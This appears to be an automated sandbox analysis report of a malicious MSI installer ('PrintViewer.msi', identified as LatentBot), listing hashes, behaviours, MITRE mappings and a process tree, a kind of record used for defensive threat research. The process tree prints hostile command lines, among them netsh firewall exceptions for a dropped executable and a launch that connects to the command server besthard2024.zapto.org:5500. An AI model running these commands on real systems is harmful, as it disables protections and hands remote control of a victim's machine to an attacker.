Analysis
-
max time kernel
145s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25-09-2024 22:29
Static task
static1
Behavioral task
behavioral1
Sample
PrintViewer.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PrintViewer.msi
Resource
win10v2004-20240802-en
General
-
Target
PrintViewer.msi
-
Size
6.7MB
-
MD5
85f914ec316e8d20e8e13ef3719e04e4
-
SHA1
86ec276d409525bd8c1ef6d47ec8eece7639c0a2
-
SHA256
00ceea629efd7eb1d9eee5706ce8089336259c099fc4af274baf857bd1ddf230
-
SHA512
6a9eebfd6b4e794ab1fd949fa2093559460390a1d7843484e2086145e2ae968d8c347a3b3392aab2ebc41463cf97a3d36b23b6e8f80000949bb66c8eff3ba4e6
-
SSDEEP
98304:57vB+ZHiEZJMuI9JqwLOO+lzsnMHDqqxLSd7qqXR2EkLus6elw5Xe21NtcP33h3u:5IiiJiTqwLOTsMHDHBAI8kcXvWP1u
Malware Config
Extracted
latentbot
besthard2024.zapto.org
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 4588 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4592 netsh.exe 3896 netsh.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\Windows\Installer\e578f30.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI90F6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI91D3.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI931D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9408.tmp msiexec.exe File opened for modification C:\Windows\Installer\e578f30.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8FBD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9184.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9261.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{47512254-C195-428F-AD42-A0F24652B3FD} msiexec.exe -
Executes dropped EXE 4 IoCs
pid Process 1508 MSI9408.tmp 100 PrintDrivers.exe 2264 PrintDriver.exe 3808 PrintDrivers.exe -
Loads dropped DLL 5 IoCs
pid Process 1876 MsiExec.exe 1876 MsiExec.exe 1876 MsiExec.exe 1876 MsiExec.exe 1876 MsiExec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 4588 msiexec.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSI9408.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 732 timeout.exe 212 timeout.exe 3436 timeout.exe 2828 timeout.exe 4620 timeout.exe 1824 timeout.exe 2064 timeout.exe 3848 timeout.exe 4244 timeout.exe 1904 timeout.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Kills process with taskkill 3 IoCs
pid Process 3228 taskkill.exe 3860 taskkill.exe 2332 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4740 msiexec.exe 4740 msiexec.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe 100 PrintDrivers.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4588 msiexec.exe Token: SeIncreaseQuotaPrivilege 4588 msiexec.exe Token: SeSecurityPrivilege 4740 msiexec.exe Token: SeCreateTokenPrivilege 4588 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4588 msiexec.exe Token: SeLockMemoryPrivilege 4588 msiexec.exe Token: SeIncreaseQuotaPrivilege 4588 msiexec.exe Token: SeMachineAccountPrivilege 4588 msiexec.exe Token: SeTcbPrivilege 4588 msiexec.exe Token: SeSecurityPrivilege 4588 msiexec.exe Token: SeTakeOwnershipPrivilege 4588 msiexec.exe Token: SeLoadDriverPrivilege 4588 msiexec.exe Token: SeSystemProfilePrivilege 4588 msiexec.exe Token: SeSystemtimePrivilege 4588 msiexec.exe Token: SeProfSingleProcessPrivilege 4588 msiexec.exe Token: SeIncBasePriorityPrivilege 4588 msiexec.exe Token: SeCreatePagefilePrivilege 4588 msiexec.exe Token: SeCreatePermanentPrivilege 4588 msiexec.exe Token: SeBackupPrivilege 4588 msiexec.exe Token: SeRestorePrivilege 4588 msiexec.exe Token: SeShutdownPrivilege 4588 msiexec.exe Token: SeDebugPrivilege 4588 msiexec.exe Token: SeAuditPrivilege 4588 msiexec.exe Token: SeSystemEnvironmentPrivilege 4588 msiexec.exe Token: SeChangeNotifyPrivilege 4588 msiexec.exe Token: SeRemoteShutdownPrivilege 4588 msiexec.exe Token: SeUndockPrivilege 4588 msiexec.exe Token: SeSyncAgentPrivilege 4588 msiexec.exe Token: SeEnableDelegationPrivilege 4588 msiexec.exe Token: SeManageVolumePrivilege 4588 msiexec.exe Token: SeImpersonatePrivilege 4588 msiexec.exe Token: SeCreateGlobalPrivilege 4588 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeRestorePrivilege 4740 msiexec.exe Token: SeTakeOwnershipPrivilege 4740 msiexec.exe Token: SeIncreaseQuotaPrivilege 3408 WMIC.exe Token: SeSecurityPrivilege 3408 WMIC.exe Token: SeTakeOwnershipPrivilege 3408 WMIC.exe Token: SeLoadDriverPrivilege 3408 WMIC.exe Token: SeSystemProfilePrivilege 3408 WMIC.exe Token: SeSystemtimePrivilege 3408 WMIC.exe Token: SeProfSingleProcessPrivilege 3408 WMIC.exe Token: SeIncBasePriorityPrivilege 3408 WMIC.exe Token: SeCreatePagefilePrivilege 3408 WMIC.exe Token: SeBackupPrivilege 3408 WMIC.exe Token: SeRestorePrivilege 3408 WMIC.exe Token: SeShutdownPrivilege 3408 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 4588 msiexec.exe 4588 msiexec.exe 2264 PrintDriver.exe 2264 PrintDriver.exe 2264 PrintDriver.exe 2264 PrintDriver.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2264 PrintDriver.exe 2264 PrintDriver.exe 2264 PrintDriver.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4740 wrote to memory of 1876 4740 msiexec.exe 84 PID 4740 wrote to memory of 1876 4740 msiexec.exe 84 PID 4740 wrote to memory of 1876 4740 msiexec.exe 84 PID 4740 wrote to memory of 1508 4740 msiexec.exe 85 PID 4740 wrote to memory of 1508 4740 msiexec.exe 85 PID 4740 wrote to memory of 1508 4740 msiexec.exe 85 PID 3920 wrote to memory of 3656 3920 cmd.exe 89 PID 3920 wrote to memory of 3656 3920 cmd.exe 89 PID 3920 wrote to memory of 4860 3920 cmd.exe 90 PID 3920 wrote to memory of 4860 3920 cmd.exe 90 PID 3920 wrote to memory of 3912 3920 cmd.exe 91 PID 3920 wrote to memory of 3912 3920 cmd.exe 91 PID 3912 wrote to memory of 3092 3912 cmd.exe 92 PID 3912 wrote to memory of 3092 3912 cmd.exe 92 PID 3920 wrote to memory of 3408 3920 cmd.exe 93 PID 3920 wrote to memory of 3408 3920 cmd.exe 93 PID 3920 wrote to memory of 3924 3920 cmd.exe 94 PID 3920 wrote to memory of 3924 3920 cmd.exe 94 PID 3920 wrote to memory of 1504 3920 cmd.exe 96 PID 3920 wrote to memory of 1504 3920 cmd.exe 96 PID 3920 wrote to memory of 3508 3920 cmd.exe 97 PID 3920 wrote to memory of 3508 3920 cmd.exe 97 PID 3508 wrote to memory of 4164 3508 cmd.exe 98 PID 3508 wrote to memory of 4164 3508 cmd.exe 98 PID 3508 wrote to memory of 4592 3508 cmd.exe 99 PID 3508 wrote to memory of 4592 3508 cmd.exe 99 PID 3508 wrote to memory of 3896 3508 cmd.exe 100 PID 3508 wrote to memory of 3896 3508 cmd.exe 100 PID 3508 wrote to memory of 4972 3508 cmd.exe 101 PID 3508 wrote to memory of 4972 3508 cmd.exe 101 PID 3508 wrote to memory of 3484 3508 cmd.exe 102 PID 3508 wrote to memory of 3484 3508 cmd.exe 102 PID 3508 wrote to memory of 2264 3508 cmd.exe 103 PID 3508 wrote to memory of 2264 3508 cmd.exe 103 PID 3920 wrote to memory of 4620 3920 cmd.exe 104 PID 3920 wrote to memory of 4620 3920 cmd.exe 104 PID 3920 wrote to memory of 3228 3920 cmd.exe 105 PID 3920 wrote to memory of 3228 3920 cmd.exe 105 PID 3920 wrote to memory of 1824 3920 cmd.exe 106 PID 3920 wrote to memory of 1824 3920 cmd.exe 106 PID 3920 wrote to memory of 3860 3920 cmd.exe 107 PID 3920 wrote to memory of 3860 3920 cmd.exe 107 PID 3920 wrote to memory of 2064 3920 cmd.exe 108 PID 3920 wrote to memory of 2064 3920 cmd.exe 108 PID 3920 wrote to memory of 2332 3920 cmd.exe 109 PID 3920 wrote to memory of 2332 3920 cmd.exe 109 PID 3920 wrote to memory of 3808 3920 cmd.exe 110 PID 3920 wrote to memory of 3808 3920 cmd.exe 110 PID 3920 wrote to memory of 3808 3920 cmd.exe 110 PID 4064 wrote to memory of 4652 4064 cmd.exe 113 PID 4064 wrote to memory of 4652 4064 cmd.exe 113 PID 4064 wrote to memory of 3608 4064 cmd.exe 114 PID 4064 wrote to memory of 3608 4064 cmd.exe 114 PID 4064 wrote to memory of 5104 4064 cmd.exe 115 PID 4064 wrote to memory of 5104 4064 cmd.exe 115 PID 5104 wrote to memory of 4540 5104 cmd.exe 116 PID 5104 wrote to memory of 4540 5104 cmd.exe 116 PID 4064 wrote to memory of 3848 4064 cmd.exe 117 PID 4064 wrote to memory of 3848 4064 cmd.exe 117 PID 4064 wrote to memory of 732 4064 cmd.exe 125 PID 4064 wrote to memory of 732 4064 cmd.exe 125 PID 4064 wrote to memory of 4244 4064 cmd.exe 127 PID 4064 wrote to memory of 4244 4064 cmd.exe 127 PID 4064 wrote to memory of 212 4064 cmd.exe 128
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\PrintViewer.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4588
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9152167B1A0DB117DAB500E83DA1D16E2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1876
-
-
C:\Windows\Installer\MSI9408.tmp"C:\Windows\Installer\MSI9408.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1508
-
-
C:\Games\PrintDrivers.exe"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\system32\mode.comMode 90,202⤵PID:3656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:4860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:3092
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"2⤵PID:3924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"2⤵PID:1504
-
-
C:\Windows\system32\cmd.execmd2⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\system32\mode.comMode 90,203⤵PID:4164
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4592
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3896
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline3⤵PID:4972
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"3⤵PID:3484
-
-
C:\Games\PrintDriver.exeC:\Games\PrintDriver.exe -autoreconnect ID:5229182 -connect besthard2024.zapto.org:5500 -run3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2264
-
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:4620
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:3228
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:1824
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:3860
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2064
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:2332
-
-
C:\Games\PrintDrivers.exeC:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\mode.comMode 90,202⤵PID:4652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:3608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:4540
-
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:3848
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:732
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:4244
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:212
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1904
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:3436
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2828
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
1System Binary Proxy Execution
1Msiexec
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
418KB
MD57dbddb025413d21e7f20dfc620235b2d
SHA18f737da5639aa4036622b6cc164416868a1918f3
SHA256df5f357c9561f91a8f06128323636d42befad499f847f59b475259f6702e3be3
SHA51222b4437e377221aebf253abaac6e91834905755198ee695e414ac877fe6ab89680c960c59bfcd9483ca3e0b34170046c19dfb41aa194016f85fae74bfbc61202
-
Filesize
2.8MB
MD527c1c264c6fce4a5f44419f1783db8e0
SHA1e071486e4dfef3a13f958a252d7000d3ce7bfd89
SHA25629379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db
SHA512a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98
-
Filesize
1KB
MD56eb13f7936a83f4c44842029914aad6e
SHA17b9b27731d4ca6f996ce68c5d68b4d653e31d915
SHA2568d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49
SHA512227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e
-
Filesize
1KB
MD5eacc690f71a77685f030bef23b506b91
SHA103b911ba997d44028bf515ea44fe4813b4b4a785
SHA2560f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263
SHA5129870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d
-
Filesize
403KB
MD529ed7d64ce8003c0139cccb04d9af7f0
SHA18172071a639681934d3dc77189eb88a04c8bcfac
SHA256e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f
SHA5124bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415
-
Filesize
1KB
MD5b9dfbea744cc6c65473a97f2b959e44c
SHA1c022f1d97fa56d61ad935aafa4e9e59e611e746a
SHA2566f95a4eff9b0c2eaf37104b323d2b09c037aa7c3d472a1887c0f7914aa6c835d
SHA512b92c8ea3583eb87f365b96cd45562cac2c4343e281c5090fc00db3f03bb5538a2d8aea3c39449d8d79cad31ed3692f6045266811d50fdd69807d8b12a9649eb5
-
Filesize
870B
MD5fd3b5847ddb8a31413951c0aa870ab95
SHA1e3e91e3e9fa442cd1937422120de91da87973ddb
SHA256e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad
SHA5125d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096
-
Filesize
936KB
MD513056f6fc48a93c1268d690e554f4571
SHA1b83de3638e8551a315bb51703762a9820a7e0688
SHA256aeda49baf2d79da2f7a9266f1fb7884111c2620e187090321f5278af5131c996
SHA512ca828b4248e399178a8614f941332d159a30bad0156df0d5f4c4ca9d74d0ccb61fac59f34c945f5f914e22ec639bd97718f76d21b452825b07fe4041d1a44824
-
Filesize
413KB
MD5c8311ded7db427ce2c2879558ce8a8c1
SHA11895ce48297025dc005ebebc8256ac6d62013dec
SHA2566fc76509f00c8ac81b597feeab520e684d190d831d828ca318d1e54afbf4a193
SHA512d293885ef98f4e3fd9794500b8d560354cec3227916df05027f8c311076c60f11b6857e4e0ab0618f4d42da8141b42bcfb829a3a43b29a73ce0aa9967a80a232